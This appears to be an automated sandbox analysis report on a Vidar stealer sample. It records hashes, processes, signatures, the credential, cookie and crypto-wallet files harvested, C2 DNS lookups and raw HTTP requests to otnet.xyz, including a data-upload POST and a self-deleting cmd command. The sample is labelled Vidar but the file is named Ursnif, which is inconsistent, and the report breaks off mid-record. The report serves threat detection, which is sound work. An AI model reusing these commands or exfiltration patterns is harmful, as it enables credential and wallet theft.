- * MalFamily: "Vidar"
- * MalScore: 10.0
- * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
- * File Size: 684032
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
- * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
- * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
- * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
- * CRC32: "BFC0FAFA"
- * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
- * Process Execution:
- "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "taskhost.exe"
- * Executed Commands:
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request": "http://otnet.xyz/141"
- "suspicious_request": "http://otnet.xyz/freebl3.dll"
- "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "suspicious_request": "http://otnet.xyz/mozglue.dll"
- "suspicious_request": "http://otnet.xyz/msvcp140.dll"
- "suspicious_request": "http://otnet.xyz/nss3.dll"
- "suspicious_request": "http://otnet.xyz/softokn3.dll"
- "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
- "suspicious_request": "http://ip-api.com/line/"
- "suspicious_request": "http://otnet.xyz/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://otnet.xyz/141"
- "url": "http://otnet.xyz/freebl3.dll"
- "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "url": "http://otnet.xyz/mozglue.dll"
- "url": "http://otnet.xyz/msvcp140.dll"
- "url": "http://otnet.xyz/nss3.dll"
- "url": "http://otnet.xyz/softokn3.dll"
- "url": "http://otnet.xyz/vcruntime140.dll"
- "url": "http://ip-api.com/line/"
- "url": "http://otnet.xyz/"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Español"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
- * Modified Files:
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "otnet.xyz",
- "answers":
- "data": "209.141.47.33",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "209.141.47.33",
- "domain": "otnet.xyz"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://otnet.xyz/141",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/141",
- "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll",
